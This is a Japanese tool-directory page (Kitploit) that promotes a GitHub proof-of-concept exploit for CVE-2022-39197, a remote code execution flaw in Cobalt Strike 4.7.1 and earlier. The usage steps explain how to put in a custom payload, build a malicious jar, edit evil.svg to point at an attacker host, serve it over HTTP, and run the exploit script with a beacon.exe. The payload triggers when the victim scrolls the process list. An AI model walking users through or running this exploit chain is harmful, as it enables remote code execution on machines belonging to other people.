Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-39197 — CobaltStrike <= 4.7.1 RCE | Kitploit
ツール/GitHubGitHub/its-arun/cve-2022-39197
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールレッドチーミングペイロード開発
GitHubits-arun/cve-2022-39197

CVE-2022-39197

CobaltStrike <= 4.7.1 RCE

リポジトリを見る
387753年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-39197 RCE POC

使い方

  • ペイロードの準備
  1. EvilJar/src/main/java/Exploit.java 内の Line 19 を自分のペイロードに編集します
  2. jar をビルドします: mvn clean compile assembly:single
  3. EvilJar-1.0-jar-with-dependencies.jar を EvilJar/target/ から serve/ フォルダーへ移動します
  4. serve\evil.svg を編集し、[attacker] を置き換えます
  5. python3 -m http.server 8080 で配信します
  • エクスプロイトの実行
root@kitploit:~
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

ユーザーがプロセスリストをスクロールするとすぐに、ペイロードがトリガーされます

POC.JPG?

1.jpg

参考リンク

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — この脆弱性の詳細な分析が掲載されています https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

ツールをダウンロード